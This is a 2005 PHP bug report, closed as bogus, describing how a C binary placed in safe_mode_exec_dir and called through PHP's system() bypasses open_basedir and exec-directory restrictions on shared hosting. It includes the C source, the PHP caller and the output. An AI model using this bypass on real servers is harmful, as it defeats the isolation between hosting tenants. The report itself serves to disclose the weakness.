ID: 32421 User updated by: ricardi at gmail dot com Reported By: ricardi at gmail dot com Status: Bogus Bug Type: Program Execution Operating System: *nix (Tested on Linux) PHP Version: 4.3.10 New Comment:
The PHP engine can't not control de children created by the exec functions? This could be a great security enhancement, since that some php applications are suffering from xploits that use this technic. I've already disable this functions now, but our clients are unhappy with this limitations. Previous Comments: ------------------------------------------------------------------------ [2005-03-23 08:23:53] [EMAIL PROTECTED] Disable system() and other exec functions then. PHP is unable to prevent you to shoot your leg or to format harddrive with a binary called by a binary. ------------------------------------------------------------------------ [2005-03-23 01:10:23] ricardi at gmail dot com Description: ------------ We bypass the safe_mode restrictions using binary with "system" function built-in. The problem occurs when we had an incident in a mass virtualhost machine. One of the domains, execute a script that bypass the safe_mode restrictions like open_base_dir and safe_mode_exec_dir. The configurations in the virtualhost was like: <VirtualHost *> ServerName www.something.com ServerPath /mnt/nfs/domains/something.com.br/www php_admin_value open_basedir /mnt/nfs/domains/something.com.br/ php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/ php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/ php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/ ... </VirtualHost> We create a simple program in "C" that create a file outside the open_basedir and execute a binary that isn't in the safe_mode_exec_dir: /* --------------- Contents of file.c ---------------- */ #include <stdio.h> int main() { system("find / -maxdepth 1 > /tmp/trash.txt"); return 0; } Compiling: gcc -o file file.c With an ftp access, we put the file in the safe_mode_exec_dir: > ls -la mnt/nfs/domains/something.com.br/ -rwxr-xr-x 1 nfsnobod nfsnobod 13576 Mar 22 16:57 file Now create a php script that calls the binary. <?php system("file"); ?> Then put this on the webroot and after accessing the script with http://www.something.com.br/script.php, check the /tmp: > ls -la /tmp -rw-r--r-- 1 nfsnobody nfsnobody 139 Mar 22 21:00 trash.txt We had to disable the execution feature from our product. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=32421&edit=1